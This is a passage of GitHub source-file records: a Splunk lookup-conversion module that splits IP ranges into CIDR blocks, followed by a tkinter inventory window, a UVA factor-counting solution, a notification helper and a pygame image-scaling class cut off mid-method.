[]):\n if self.custom_data.case_sensitive:\n output[representation] = None\n else:\n output[representation.lower()] = None\n \n return (output.keys(), NOT_DEFERRED)\n\n\nclass IdentityIdFieldMapping(FieldMapping):\n \n def convert(self, value, dependencies, requirements, record_num):\n '''Concatenate fields to form an identity ID.\n Zero-length string will evaluate to false.\n \n The ID field refers to the value in the ORIGINAL lookup\n table, not the converted one. 
This allows us to correlate\n the generated line with a specific line in the original input file.\n \n Any incoming value is ignored.\n '''\n \n ident_id = ''.join([requirements.get(i, '') for i in ['identity', 'first', 'last', 'email']])\n\n # Zero-length string will evaluate to false\n return (hashlib.sha1(ident_id).hexdigest() if ident_id else '', NOT_DEFERRED)\n\n\nclass IdentityTagFieldMapping(FieldMapping):\n\n def convert(self, value, dependencies, requirements, record_num):\n '''Return the identity_tag for the host.'''\n \n # Incoming value is actually ignored for identity_tag as it is a generated field.\n \n # Retrieve dependencies\n bunit = dependencies.get('bunit', [])\n categories = dependencies.get('category', [])\n watchlist = dependencies.get('watchlist', False)\n\n tag = set()\n \n # Make sure to add multiple categories if they exist.\n if isinstance(categories, list):\n for category in categories:\n tag.add(category)\n else:\n tag.add(categories)\n \n try:\n if splunk.util.normalizeBoolean(watchlist, False):\n tag.add('watchlist')\n except ValueError:\n # Catch exception in case the CSV entry cannot be\n # interpreted as a Boolean.\n pass\n \n # Business unit is single-valued \n tag.add(bunit)\n\n # Discard empty entries.\n tag.discard('')\n\n # Return multi-valued output IFF there is only more than one item.\n if len(tag) == 0:\n return ('', NOT_DEFERRED)\n elif len(tag) == 1:\n return (tag.pop(), NOT_DEFERRED)\n else:\n return (list(tag), NOT_DEFERRED)\n \n \nclass IpAddressFieldMapping(FieldMapping):\n\n def __init__(self, *args, **kwargs):\n FieldMapping.__init__(self, *args, **kwargs)\n\n # Define heap of IP ranges as tuples of long integers:\n #\n # (range_low, range_high).\n #\n # The heap is used to split IP ranges when smaller ranges (including\n # single addresses) are specified elsewhere in the lookup table.\n # In the case of a duplication or overlap, the entry with the \"lowest\" \n # priority and asset_id will win. Priority is used so that assets \n # specified as single IP addresses in the original table will always \n # win out over ranges or subnets, and ranges or subnets defined\n # in the original asset table will win out over ranges derived by \n # calculation. \n self._ranges = []\n\n def _split_ip_ranges(self):\n '''Given a heap of tuples:\n (range_low, range_high, key)\n split the numeric ranges so that there are no overlapping\n ranges. 
For instance, given:\n \n (100, 101, , a)\n (100, 105, , b)\n (106, 110, , c)\n return:\n (100, 101, , [a,b])\n (102, 105, , b)\n (106, 110, , c)\n\n Ambiguous overlaps result in the second range being discarded.\n This can be used to sort lists of subnets in (range_low, range_high)\n format when the bounding IPs are expressed as long integers.\n This function takes advantage of Python's heapq, which\n can accept tuples and sort them properly based on all values\n in the tuple.\n \n There are some extraneous heappush() and heappop() calls here; it \n would be possible to construct an equivalent function that\n always retained the lowest range in rangeA.\n '''\n \n overlap_warning = \"Range overlap: rangeA_rows={0} rangeB_rows={1} rangeA={2}-{3} rangeB={4}-{5}\"\n duplicate_warning = \"Range duplicated: rangeA_rows={0} rangeB_rows={1} rangeA={2}-{3} rangeB={4}-{5}\"\n \n output = []\n if len(self._ranges) > 0:\n while len(self._ranges) > 1:\n rangeA_low, rangeA_high, rangeA_priority, rangeA_rows = heapq.heappop(self._ranges)\n rangeB_low, rangeB_high, rangeB_priority, rangeB_rows = heapq.heappop(self._ranges)\n if not isinstance(rangeA_rows, list):\n rangeA_rows = [rangeA_rows]\n if not isinstance(rangeB_rows, list):\n rangeB_rows = [rangeB_rows]\n if rangeA_low < rangeB_low:\n if rangeA_high < rangeB_high:\n if rangeA_high < rangeB_low:\n # Ranges do not overlap.\n # 1. Push rangeA to output.\n # 2. Push rangeB back onto heap, as it may overlap\n # with the next range.\n output.append((rangeA_low, rangeA_high, rangeA_priority, rangeA_rows))\n heapq.heappush(self._ranges, (rangeB_low, rangeB_high, rangeB_priority, rangeB_rows))\n else:\n # Range overlap.\n # 1. Split BOTH ranges into range A', range C, range B'.\n # 2. Add rows from both rangeA and rangeB to rangeC \n # 3. Add all three ranges back to heap, increasing priority.\n rangeC_low, rangeC_high = rangeB_low, rangeA_high\n rangeA_high = rangeB_low - 1\n rangeB_low = rangeA_high + 1\n rangeC_rows = rangeA_rows + rangeB_rows\n # TODO: How best to calculate rangeC priority?\n rangeC_priority = rangeA_priority\n logger.debug(overlap_warning.format(rangeA_rows, rangeB_rows, ipMath.LongToIP(rangeA_low), ipMath.LongToIP(rangeA_high), ipMath.LongToIP(rangeB_low), ipMath.LongToIP(rangeB_high)))\n heapq.heappush(self._ranges, (rangeA_low, rangeA_high, rangeA_priority + 1, rangeA_rows))\n heapq.heappush(self._ranges, (rangeC_low, rangeC_high, rangeC_priority + 1, rangeC_rows))\n heapq.heappush(self._ranges, (rangeB_low, rangeB_high, rangeB_priority + 1, rangeB_rows))\n elif rangeA_high == rangeB_high:\n # rangeA subsumes rangeB \"on left\".\n # 1. Split rangeA into rangeA', rangeB and increase priority of A'.\n # 2. Push rangeA to output (this is guaranteed to be OK\n # since rangeA_low < rangeB_low)\n # 3. Add rangeA rows to rangeB\n # 4. Return rangeB to heap.\n # 5. Continue\n rangeA_high = rangeB_low - 1\n output.append((rangeA_low, rangeA_high, rangeA_priority + 1, rangeA_rows))\n rangeB_rows.extend(rangeA_rows)\n heapq.heappush(self._ranges, (rangeB_low, rangeB_high, rangeB_priority, rangeB_rows))\n elif rangeA_high > rangeB_high:\n # rangeA subsumes rangeB on both sides.\n # 1. Split rangeA into rangeA', rangeB, rangeA'' and increase priority of A' and A''.\n # 2. Push rangeA' to output (this is guaranteed to be OK\n # since rangeA_low < rangeB_low)\n # 3. Add rangeA rows to rangeB\n # 4. Return rangeB, rangeA'' to heap.\n # 5. 
Continue.\n                        rangeAprime_high = rangeA_high\n                        rangeAprime_low = rangeB_high + 1\n                        rangeA_high = rangeB_low - 1\n                        output.append((rangeA_low, rangeA_high, rangeA_priority + 1, rangeA_rows))\n                        rangeB_rows.extend(rangeA_rows)\n                        heapq.heappush(self._ranges, (rangeAprime_low, rangeAprime_high, rangeA_priority + 1, rangeA_rows))\n                        heapq.heappush(self._ranges, (rangeB_low, rangeB_high, rangeB_priority, rangeB_rows))\n                    else:\n                        # This should never happen due to heap ordering.\n                        raise ValueError('Range ordering was invalid... aborting lookup generation.')\n                elif rangeA_low == rangeB_low:\n                    if rangeA_high == rangeB_high:\n                        # Exact duplicate.\n                        # 1. Add rangeB rows to rangeA\n                        # 2. Discard rangeB.\n                        # 3. Continue.\n                        logger.debug(duplicate_warning.format(rangeA_rows, rangeB_rows, ipMath.LongToIP(rangeA_low), ipMath.LongToIP(rangeA_high), ipMath.LongToIP(rangeB_low), ipMath.LongToIP(rangeB_high)))\n                        rangeA_rows.extend(rangeB_rows)\n                        heapq.heappush(self._ranges, (rangeA_low, rangeA_high, rangeA_priority, rangeA_rows))\n                    elif rangeA_high < rangeB_high:\n                        # rangeB subsumes rangeA \"on right\".\n                        # 1. Split rangeB into rangeA, rangeB' and increase priority of B'.\n                        # 2. Add rangeB rows to rangeA\n                        # 3. Push both ranges back to heap.\n                        # 4. Continue.\n                        rangeB_low = rangeA_high + 1\n                        rangeA_rows.extend(rangeB_rows)\n                        heapq.heappush(self._ranges, (rangeA_low, rangeA_high, rangeA_priority, rangeA_rows))\n                        heapq.heappush(self._ranges, (rangeB_low, rangeB_high, rangeB_priority + 1, rangeB_rows))\n                    else:\n                        # This is the rangeA_high > rangeB_high case: this should never happen\n                        # due to heap ordering.\n                        raise ValueError('Range ordering invalid... aborting lookup generation.')\n            \n            # Append final range if one is present.\n            if len(self._ranges) > 0:\n                output.append(heapq.heappop(self._ranges))\n        return output\n    \n    def convert(self, value, dependencies, requirements, record_num):\n        '''Convert an input IP address value to a CIDR value compatible\n        with a Splunk lookup table.\n        \n        Five possibilities:\n        1. The value is a range. Processing will be deferred so that the\n           range can be split into CIDR subnets and checked for overlaps\n           with other entries.\n        2. The value is an IP. Output it directly, but add the address to\n           the list of all IP ranges to avoid overlap. Thus, a specific single\n           IP entry in the input CSV takes precedence over a range.\n        3. The value is a CIDR address. If it is an IP in /32 form, \n           treat as in step 2. Otherwise, treat as in step 1.\n        4. The entry is blank. Ignore it.\n        5. The entry is invalid in some other way. Return the original value.\n           This should not happen due to input validation but is accounted for\n           in this code for safety.\n        '''\n\n        # Remove leading and trailing whitespace. \n        value = value.strip()\n        \n        # Use lineno if a different sorting order is not implied by dependencies.\n        # TODO: handle asset_id renaming to row_id in dependencies array.\n        # TODO: specify sorting order.\n        row_id = record_num\n        if dependencies:\n            row_id = dependencies.get('row_id', record_num)\n\n        if '-' in value: \n            # The value is likely an IP range. \n            # 1. Split into tuple and validate.\n            #    a. If valid, push range onto heap.\n            #    b. If NOT valid, short-circuit and return original value\n            #       (this should actually never happen due to validate() method).\n            # 2. 
Return the range as (range_low, range_high) tuple and defer processing.\n range_low, range_high = value.split('-', 1)\n if ipMath.is_valid_ip(range_low) and ipMath.is_valid_ip(range_high):\n range_low = ipMath.IPToLong(range_low)\n range_high = ipMath.IPToLong(range_high)\n heapq.heappush(self._ranges, (range_low, range_high, 1, row_id))\n return ((range_low, range_high), DEFERRED)\n else:\n sys.stdout.write(LookupConversionErrors.ERR_INVALID_IP_RANGE + ': %s\\n' % value)\n return (value, NOT_DEFERRED)\n\n elif ipMath.is_valid_ip(value):\n # This is a VALID IP ADDRESS.\n # 1. Add to the heap of IPs in /32 syntax.\n # 2. Return the value unchanged, do not conduct deferred processing\n # (duplicate elimination is handled in converters.py::_format_output).\n ipLong = ipMath.IPToLong(value)\n heapq.heappush(self._ranges, (ipLong, ipLong, 0, row_id))\n return (value, NOT_DEFERRED)\n\n elif ipMath.is_valid_cidr(value):\n # This is a VALID CIDR specifier.\n # 1. If it ends in /32, convert and treat as normal IP.\n # 2. If it is a subnet, convert to range and add to range heap\n # in (range_low, range_high) format, and defer processing.\n range_low, range_high = ipMath.CIDRToLongTuple(value)\n if range_low == range_high:\n heapq.heappush(self._ranges, (range_low, range_low, 0, row_id))\n return (value.replace('/32', ''), NOT_DEFERRED)\n else:\n heapq.heappush(self._ranges, (range_low, range_high, 1, row_id))\n return ((range_low, range_high), DEFERRED)\n\n elif value == '':\n # This is a BLANK value. Ignore it.\n return (value, NOT_DEFERRED)\n else:\n # This is an INVALID value. Return it, but log the event.\n logger.error(LookupConversionErrors.formatErr(LookupConversionErrors.ERR_INVALID_IP_OR_CIDR, value))\n return (value, NOT_DEFERRED)\n\n def postprocess(self):\n '''Conduct postprocessing.\n 1. Break the collected IP ranges into non-overlapping ranges.\n 2. Create directory keying the ranges by asset_id so we can easily\n process the deferred lines in convert_deferred().\n '''\n self._ranges_by_row_ids = {}\n\n ## Debugging code only.\n if logger.getEffectiveLevel() == logging.DEBUG:\n logger.debug(\"=====RANGES BEFORE SPLIT=====\")\n for low, high, priority, row_ids in self._ranges:\n logger.debug(str((ipMath.LongToIP(low), ipMath.LongToIP(high), priority, row_ids)))\n ## End debugging code.\n\n self._ranges = self._split_ip_ranges()\n\n # Generate [row_id] -> [ranges] dictionary\n for low, high, priority, row_ids in self._ranges:\n #print 'LOW: {} HIGH: {} PRIORITY: {} ROW_IDS: {}'.format(low, high, priority, row_ids)\n if isinstance(row_ids, list):\n for row_id in row_ids:\n tmp = self._ranges_by_row_ids.setdefault(row_id, [])\n tmp.append((low, high))\n else:\n # Only received one asset as input.\n tmp = self._ranges_by_row_ids.setdefault(row_ids, [])\n tmp.append((low, high))\n\n ## Debugging code only.\n if logger.getEffectiveLevel() == logging.DEBUG:\n logger.debug(\"=====RANGES AFTER SPLIT=====\")\n for low, high, priority, row_ids in self._ranges:\n logger.debug(str((ipMath.LongToIP(low), ipMath.LongToIP(high), priority, row_ids)))\n logger.debug(\"=====RANGES AFTER SPLIT BY ASSET ID=====\")\n for key, value in self._ranges_by_row_ids.iteritems():\n logger.debug('%s' % key)\n for theRange in value:\n low, high = theRange\n logger.debug(' %s - %s' % (ipMath.LongToIP(low), ipMath.LongToIP(high)))\n ## End debugging code.\n\n # Clear self._ranges for a subsequent run. 
This is required if the script\n # runs persistently, otherwise duplicates will accumulate.\n self._ranges = []\n return\n\n def convert_deferred(self, value, deferred_requirements, record_num):\n '''Perform deferred conversion of any IP ranges to \n CIDR subnets prior to writing the output lookup table.\n \n Note that the input value is ignored here, since the \n converted IP address range has already been determined\n in postprocessing and can be determined solely from the \n asset_id value.\n '''\n \n # If a field mapping defines a different container for the \"row_id\" we \n # need to retrieve if can be used via the following idiom.\n #\n # if deferred_requirements:\n # record_num = deferred_requirements.get('row_id', record_num)\n \n # Retrieve the ranges that are associated with the original row that\n # created this record.\n ranges = self._ranges_by_row_ids.get(record_num, None)\n\n cidr_list = []\n if ranges:\n [cidr_list.extend(ipMath.expand_ip_range_to_cidr(i)) for i in ranges]\n else:\n logger.warning(LookupConversionErrors.formatErr(LookupConversionErrors.ERR_RANGES_NOT_FOUND, record_num))\n return ipMath.trim_cidr_list(cidr_list, 32)\n \n def validate(self, value):\n # Simple validation that the value is a string of length less than the\n # maximum of an IPv6 address. IPv4 addresses in single IP/CIDR form\n # will be validated later; non-IPv4 values are passed naively to the\n # output lookup table.\n return isinstance(value, basestring) and len(value) < 40\n\nclass SimpleIpAddressFieldMapping(FieldMapping):\n\n def __init__(self, *args, **kwargs):\n FieldMapping.__init__(self, *args, **kwargs)\n\n def convert(self, value, dependencies, requirements, record_num):\n '''Convert an input IP address value to a CIDR value compatible\n with a Splunk lookup table.\n \n Several possibilities, not necessarily in order of frequency:\n 1. The value is a range. Convert it to a single IP (common case) or \n CIDR range set.\n 2. The value is an IP. Output it directly.\n 3. The value is a CIDR address. If it is an IP in /32 form, \n treat as in step 2. Otherwise, return it.\n 4. The entry is blank. Ignore it.\n 5. The entry is invalid in some other way. Return the original value.\n This should not happen due to input validation but is accounted for\n in this code for safety.\n '''\n\n # Remove leading and trailing whitespace. \n value = value.strip()\n\n if ipMath.is_valid_ip(value):\n # This is a VALID IP ADDRESS.\n return (value, NOT_DEFERRED)\n elif '-' in value:\n # The value is likely an IP range. \n # 1. If it represents a single IP, return a single IP.\n # 2. Otherwise, return a minimal CIDR format.\n # 3. If the CIDR conversion fails, return the original value but \n # log the error.\n addr_low, addr_high = value.split('-', 1)\n if addr_low == addr_high:\n return (addr_low, NOT_DEFERRED)\n else:\n try:\n return (ipMath.expand_ip_range_to_cidr(value, clean_single_ips=True, expand_subnets_smaller_than=24), NOT_DEFERRED)\n except ValueError:\n # Invalid range. Log the event.\n logger.error(LookupConversionErrors.formatErr(LookupConversionErrors.ERR_INVALID_IP_RANGE, value))\n return (value, NOT_DEFERRED)\n elif ipMath.is_valid_cidr(value):\n # This is a VALID CIDR specifier.\n # 1. If it ends in /32, convert and treat as normal IP.\n # 2. If it is a subnet, return it.\n if value.ends_with('/32'):\n return (value.replace('/32', ''), NOT_DEFERRED)\n return (value, NOT_DEFERRED)\n else:\n # This is an INVALID value. 
Return it, but log the event.\n logger.error(LookupConversionErrors.formatErr(LookupConversionErrors.ERR_INVALID_IP_OR_CIDR, value))\n return (value, NOT_DEFERRED)\n\n def validate(self, value):\n if value == \"\":\n return True\n else:\n return ipMath.is_valid_ip(value) or ipMath.is_valid_cidr(value) or ipMath.is_valid_ip_range_str(value)\n\n\nclass KeyFieldMapping(FieldMapping):\n \n def convert(self, value, dependencies, requirements, record_num):\n '''Always return an empty string during conversion. The key field is\n only written to during output lookup table generation.\n '''\n return (\"\", NOT_DEFERRED)\n \n def validate(self, *args, **kwargs):\n '''Always validate any input data for this field; the input value\n will be discarded.'''\n return True\n\n\nclass PciDomainFieldMapping(FieldMapping):\n \n def __init__(self, *args, **kwargs):\n '''Maintain a list of all PCI domains for output to ancillary\n lookup table.\n '''\n FieldMapping.__init__(self, *args, **kwargs)\n \n def convert(self, value, dependencies, requirements, record_num):\n '''Return a list of PCI domains, given an input value conssting of a\n pipe-separated string of PCI domains, conducting the following\n transformations in the order shown:\n \n 1. If category == \"pci\", add \"trust\" to pci_domain\n 2. If pci_domain in [\"wireless\", \"dmz\"], add \"trust\" to pci_domain\n 3. If category == \"cardholder\", add \"trust\" and \"cardholder\" to pci_domain\n 4. If pci_domain is empty, return \"untrust\".\n '''\n \n # Retrieve dependencies\n categories = dependencies.get('category', [])\n \n domains = set(value.split(self.delim))\n \n if 'wireless' in domains or 'dmz' in domains:\n domains.add('trust')\n\n if 'pci' in categories:\n domains.add('trust')\n \n if 'cardholder' in categories:\n domains.update(['trust', 'cardholder'])\n\n # Discard empty entries.\n domains.discard('')\n \n # Update list of all PCI domains\n self._all_values.update(domains)\n \n # Return multi-valued IFF there is only more than one item.\n if len(domains) == 0:\n return ('untrust', NOT_DEFERRED)\n elif len(domains) == 1:\n return (domains.pop(), NOT_DEFERRED)\n else:\n return (list(domains), NOT_DEFERRED)\n","repo_name":"aloualou/DCOM_deployment_apps_beta","sub_path":"SA-Utils/lib/SolnCommon/lookup_conversion/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":43425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
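The fields.py record above expands inclusive IP ranges into CIDR blocks through its internal ipMath helpers, whose bodies are not shown here. A minimal stdlib sketch of the same transformation using Python 3's ipaddress module (the function name is illustrative, not the project's):

```python
import ipaddress

def expand_range_to_cidr(low, high):
    """Smallest set of CIDR networks covering the inclusive range low..high."""
    first = ipaddress.IPv4Address(low)
    last = ipaddress.IPv4Address(high)
    return [str(net) for net in ipaddress.summarize_address_range(first, last)]

print(expand_range_to_cidr('10.0.0.1', '10.0.0.6'))
# ['10.0.0.1/32', '10.0.0.2/31', '10.0.0.4/31', '10.0.0.6/32']
```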
+{"seq_id":"14797600340","text":"import base64\nimport tkinter as tk\nimport assets.style as style\n\nfrom database.raw import RawSQL\nfrom database.product import ProductSQL\nfrom database.raw_product import RawProductSQL\nfrom tkinter import filedialog\n\nclass WindowRawDetail(tk.Frame):\n\n def __init__(self, frame_options, main_window, raw_id):\n tk.Frame.__init__(self, frame_options)\n self.main_window = main_window\n\n tk.Button(self, text='📄 Back To List', command=lambda: main_window.show_raw_list(self)) \\\n .grid(column=0, row=0, sticky='ew', padx=(25, 25), pady=(25, 25))\n tk.Label(self, text='CSSP - Material Detail', font=style.title_font).grid(column=1, row=0, padx=(0, 25))\n\n rawSQL = RawSQL()\n self.raw = rawSQL.GetSingle(raw_id)\n\n tk.Label(self, text=\"Name\").grid(row=1, sticky='w', padx=(25, 0), pady=(0, 5))\n tk.Entry(self, textvariable=self.raw.name).grid(row=1, column=1, padx=(0, 25), sticky='ew')\n\n tk.Label(self, text=\"Date of Purchase\").grid(row=2, sticky='w', padx=(25, 0), pady=(5, 5))\n tk.Entry(self, textvariable=self.raw.date_of_purchase).grid(row=2, column=1, padx=(0, 25), sticky='ew')\n\n tk.Label(self, text=\"Name of Supplier\").grid(row=3, sticky='w', padx=(25, 0), pady=(5, 5))\n tk.Entry(self, textvariable=self.raw.name_of_supplier).grid(row=3, column=1, padx=(0, 25), sticky='ew')\n\n tk.Label(self, text=\"Storage Expiration Date\").grid(row=4, sticky='w', padx=(25, 0), pady=(5, 5))\n tk.Entry(self, textvariable=self.raw.storage_expiration_date).grid(row=4, column=1, padx=(0, 25), sticky='ew')\n\n tk.Label(self, text=\"Storage Code\").grid(row=5, sticky='w', padx=(25, 0), pady=(5, 5))\n tk.Entry(self, textvariable=self.raw.storage_code).grid(row=5, column=1, padx=(0, 25), sticky='ew')\n\n tk.Label(self, text=\"Description\").grid(row=6, sticky='w', padx=(25, 0), pady=(5, 5))\n tk.Entry(self, textvariable=self.raw.description).grid(row=6, column=1, padx=(0, 25), sticky='ew')\n\n productSQL = ProductSQL()\n products = productSQL.GetAll()\n rawProductSQL = RawProductSQL()\n selected_products = rawProductSQL.GetRawProducts(raw_id)\n mb = tk.Menubutton(self, text=\"👇🏻 Select Products From List\", relief=tk.RAISED)\n mb.menu = tk.Menu(mb, tearoff=0)\n mb[\"menu\"] = mb.menu\n self.menu_products = {}\n for product in products:\n if int(product.id.get()) in selected_products:\n default_value = 1\n else:\n default_value = 0\n var = tk.IntVar(value=default_value)\n mb.menu.add_checkbutton(label=product.name.get(), variable=var, onvalue=1, offvalue=0)\n self.menu_products[product.id.get()] = var\n mb.grid(row=7, columnspan=2, sticky='ew', padx=(25, 25), pady=(5, 0))\n\n tk.Button(self, text=\"🌇 Take Image\", command=lambda: self.UploadFile()) \\\n .grid(row=8, sticky='ew', padx=(25, 5), pady=(5, 5))\n tk.Button(self, text=\"🗑️ Delete Image\", command=self.DeleteFile) \\\n .grid(row=8, column=1, sticky='ew', padx=(5, 25), pady=(5, 5))\n if self.raw.image:\n stock_image = tk.PhotoImage(data=base64.b64decode(self.raw.image))\n self.raw_image = tk.Label(self, image=stock_image)\n self.raw_image.image = stock_image\n self.raw_image.grid(row=9, columnspan=2, padx=(25, 25), pady=(5, 5))\n else:\n self.raw_image = tk.Label(self)\n\n tk.Button(self, text=\"✔️ Update\", command=self.UpdateRaw) \\\n .grid(row=10, columnspan=2, sticky='ew', padx=(25, 25), pady=(0, 5))\n tk.Button(self, text=\"❌ Delete\", command=self.DeleteRaw) \\\n .grid(row=11, columnspan=2, sticky='ew', padx=(25, 25), pady=(0, 25))\n\n def UploadFile(self):\n filename = 
filedialog.askopenfilename(filetypes=[('Png Files', '*.png')])\n if filename:\n img = tk.PhotoImage(file=filename)\n\n if self.raw_image:\n self.raw_image.destroy()\n self.raw_image = tk.Label(self, image=img)\n self.raw_image.image = img\n self.raw_image.grid(row=9, columnspan=2, padx=(25, 25), pady=(5, 5))\n\n self.raw.image = base64.b64encode(open(filename, 'rb').read()) #for saving the image to the database. type conversion is required.\n\n def DeleteFile(self):\n if self.raw_image:\n self.raw_image.destroy()\n self.raw.image = None\n\n def UpdateRaw(self): #the code allows us to see n pieces of data so that it is extensible\n self.raw.Update()\n rawProductSQL = RawProductSQL()\n rawProductSQL.DeleteRawProducts(self.raw.id.get())\n for product_id in self.menu_products:\n if self.menu_products[product_id].get() == 1:\n rawProductSQL.Insert(product_id, self.raw.id.get())\n self.main_window.show_raw_list(self)\n\n\n def DeleteRaw(self):\n rawProductSQL = RawProductSQL()\n rawProductSQL.DeleteRawProducts(self.raw.id.get())\n #Before raw is deleted, the raw_product table row's it depends on must be deleted.\n #If raw_prodcut table row's are not deleted, raw will get foreign key error while deleting.\n self.raw.Delete()\n self.main_window.show_raw_list(self)\n","repo_name":"nisaerarslan/cooking-stock-","sub_path":"Final Proje/proje/window_raw_detail.py","file_name":"window_raw_detail.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
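The window above persists images by base64-encoding raw PNG bytes for the database and decoding them again before constructing a tk.PhotoImage. A minimal round-trip sketch, assuming a local photo.png exists:

```python
import base64

# Save path: raw PNG bytes -> base64, safe to store in a TEXT/BLOB column.
with open('photo.png', 'rb') as f:
    stored = base64.b64encode(f.read())

# Load path: decode back to raw PNG bytes, as the window does with
# tk.PhotoImage(data=base64.b64decode(self.raw.image)).
png_bytes = base64.b64decode(stored)
```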
+{"seq_id":"33396806494","text":"'''\n20180120\tjlhung\tv1.0\n'''\n\nimport math\n\nwhile True:\n\tn = int(input())\n\tif n == 0:\n\t\tbreak\n\t\n\tc = 0\n\td = n\n\ti = 2\n\twhile i < math.sqrt(n):\n\t\tif n % i == 0:\n\t\t\tc += 1\n\t\twhile n % i == 0:\n\t\t\tn /= i\n\t\ti += 1\n\tif n != 1:\n\t\tc += 1\n\tprint(\"{} : {}\".format(d, c))\n\t","repo_name":"jlhung/UVA-Python","sub_path":"10699 - Count the factors.py","file_name":"10699 - Count the factors.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"70"}
+{"seq_id":"73512615267","text":"'''Tools for sending notifications.'''\n\nimport datetime\nimport os\nimport subprocess\nimport time\n\n\n# Attemp to use ToastNotifier (if installed) on Windows.\ntry:\n from win10toast import ToastNotifier\nexcept ImportError:\n print('No ToastNotifier module installed for notifications')\nelse:\n TOASTER = ToastNotifier()\n\n\ndef ns(title='Hello!', msg='', icon_path=None, duration=5, threaded=True, max_tries=5):\n '''Sends a desktop notification.'''\n msg = msg or 'Have a good {}!'.format(datetime.datetime.now().strftime('%A'))\n if os.name == 'nt':\n if 'TOASTER' not in globals():\n raise Exception('Not sure how to send notification without ToastNotifier')\n\n for tries in range(max_tries):\n try:\n res = TOASTER.show_toast(\n title=title, msg=msg, icon_path=icon_path, duration=duration, threaded=threaded)\n except Exception as err:\n print('Failed to send ({}/{}):\\n{}'.format(tries, max_tries, err))\n time.sleep(duration)\n else:\n if res:\n break\n # If res is False, it means notification wasn't sent, so we try again.\n time.sleep(duration)\n else:\n subprocess.call(\"ns '%s'\" % msg, shell=True)\n","repo_name":"leonardlan/myTools","sub_path":"python/notify_tools.py","file_name":"notify_tools.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
+{"seq_id":"27241354726","text":"import pygame\nfrom info import Info\ntry:\n from win32api import GetSystemMetrics\nexcept ModuleNotFoundError:\n pass\n\nclass Image:\n\n def __init__(self, program, screen, image):\n self.program = program\n self.screen = screen\n self.image = image\n self.min_height = 1000\n self.max_height = 1\n self.points = []\n\n self.message_box = pygame.image.load(\"images/message_box.png\")\n self.message_box = pygame.transform.scale(self.message_box, (round(self.message_box.get_width() / 3), round(self.message_box.get_height() / 3)))\n self.message_box_rect = self.message_box.get_rect()\n self.message_box_rect.x = 0\n self.message_box_rect.y = 0\n self.begin1 = True\n self.begin2 = True\n\n self.scale_box = pygame.image.load(\"images/input.png\")\n # self.scale_box = pygame.transform.scale()\n self.scale_box_rect = self.scale_box.get_rect()\n self.scale_box_rect.x = self.message_box_rect.x + self.message_box.get_width()\n self.scale_box_rect.y = 0\n\n self.cursor = pygame.image.load(\"images/cross3.png\")\n self.cursor_rect = self.cursor.get_rect()\n\n self.position_list = []\n self.keys = {}\n self.phrase1 = \"\"\n self.phrase2 = \"\"\n self.part = \"phrase1\"\n\n self.backwards_button = pygame.image.load(\"images/back_new.png\")\n self.backwards_button = pygame.transform.scale(self.backwards_button, (75, 50))\n self.backwards_button_rect = self.backwards_button.get_rect()\n self.backwards_button_rect.x = 20\n self.backwards_button_rect.y = 110\n\n self.done_button = pygame.image.load(\"images/new_done_button.png\")\n self.done_button = pygame.transform.scale(self.done_button, (100, 100))\n self.done_button_rect = self.done_button.get_rect()\n self.done_button_rect.x = 20\n self.done_button_rect.y = 210\n\n self.font = pygame.font.SysFont(\"Liberation Serif\", 20)\n\n self.bar = pygame.image.load(\"images/barrier.png\")\n self.bar = pygame.transform.scale(self.bar, (self.screen.get_width(), 20))\n self.bar_rect = self.bar.get_rect()\n self.bar_rect.x = 0\n self.bar_rect.y = 100\n\n self.info = Info(self.program, self.screen)\n\n self.loop = 0\n self.max_loop = 300\n\n\n\n ##############\n self.leaf_lines = []\n\n def renew_images(self):\n self.bar = pygame.transform.scale(self.bar, (self.screen.get_width(), 20))\n\n def show_scale(self, mx, my):\n if self.program.settings.info_bar_state:\n self.info.box_top((\"STEP 1\", \"Locate your scaling object on the screen\"))\n self.screen.blit(self.image, (0, 100))\n\n else:\n self.info.box_bottom((\"STEP 1\", \"Locate your scaling object on the screen\"))\n self.screen.blit(self.image, (0, 0))\n\n\n self.program.hover.show((mx, my))\n self.screen.blit(self.program.settings.button, (self.program.settings.button_rect.x, self.program.settings.button_rect.y))\n\n if len(self.position_list) == 1:\n self.cursor_rect.x = mx - 25\n self.cursor_rect.y = self.position_list[0][1] - 25\n elif len(self.position_list) == 3:\n self.cursor_rect.x = self.position_list[2][0] - 25\n self.cursor_rect.y = my - 25\n else:\n self.cursor_rect.x = mx - 25\n self.cursor_rect.y = my - 25\n\n self.screen.blit(self.cursor, (self.cursor_rect.x, self.cursor_rect.y))\n count = 1\n for point in self.position_list:\n if count == 2:\n self.screen.blit(self.cursor, (self.position_list[1][0] - 25, self.position_list[0][1] - 25))\n elif count == 4:\n self.screen.blit(self.cursor, (self.position_list[2][0] - 25, self.position_list[3][1] - 25))\n else:\n self.screen.blit(self.cursor, (point[0] - 25, point[1] - 25))\n count += 1\n if len(self.position_list) == 
4:\n self.program.case += 1\n\n def input_scale(self, mx, my):\n self.program.enable_text_input = True\n if self.keys.get(\"enter\") and self.part == \"phrase1\":\n self.part = \"phrase2\"\n self.keys[\"enter\"] = False\n elif self.keys.get(\"enter\") and self.part == \"phrase2\":\n self.program.case += 1\n self.program.hover.remove_all()\n self.program.hover.add_name(\n \"done_button\",\n self.done_button.get_width(),\n self.done_button.get_height(),\n (self.done_button_rect.x, self.done_button_rect.y),\n \"images/done_button_new_black.png\"\n )\n self.program.hover.add_name(\n \"backwards_button\",\n self.backwards_button.get_width(),\n self.backwards_button.get_height(),\n (self.backwards_button_rect.x, self.backwards_button_rect.y),\n \"images/back_new_black.png\"\n )\n self.program.hover.add_name(\n \"settings_button\",\n self.program.settings.button.get_width(),\n self.program.settings.button.get_height(),\n (self.program.settings.button_rect.x, self.program.settings.button_rect.y)\n )\n self.program.hover.reset()\n self.keys[\"enter\"] = False\n elif self.keys.get(\"back_space\") and self.part == \"phrase1\": # and not self.program.cooldown\n new_phrase = \"\"\n count = 1\n if self.phrase1 == \"\":\n self.keys[\"back_space\"] = False\n else:\n for e in self.phrase1:\n if count == len(self.phrase1):\n self.keys[\"back_space\"] = False\n self.phrase1 = new_phrase\n # self.program.cooldown = True\n break\n else:\n new_phrase += e\n count += 